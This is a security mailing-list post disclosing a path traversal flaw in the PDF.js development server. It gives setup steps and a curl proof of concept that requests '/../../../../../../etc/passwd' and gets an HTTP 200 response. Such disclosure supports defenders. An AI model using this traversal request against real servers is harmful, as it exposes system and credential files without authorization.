Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 24 Nov 2018 13:16:49 +0530
From: Dhiraj Mishra <>
Subject: Path traversal in mozilla PDF.js [Unpatched]

## Summary
A path traversal issue was observed in Mozilla PDF.js which is a PDF reader
in JavaScript. This issue was observed while code review of PDF.js
(gulpfile.js)(, Mozilla
team says "The server with pdf.js is intended to be a development server
and should not be exposed to public networks. I suppose we could update the
docs to state that." and a upstream bug was filed against the same (

## Installation
PDF.js is built into version 19+ of firefox and a chrome extension is also
available on chrome web store. To install and get a local copy of PDF.js
here are the below steps :
$ git clone
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server

I've used the attribute --path-as-is from cURL to verify this issue.
$ curl --path-as-is -v
*   Trying
* Connected to ( port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host:
> User-Agent: curl/7.58.0
> Accept: */*
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Content-Type: application/octet-stream
< Content-Length: 2745
< Date: Thu, 15 Nov 2018 06:34:32 GMT
< Connection: keep-alive

Thank you
Dhiraj (@mishradhiraj_)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.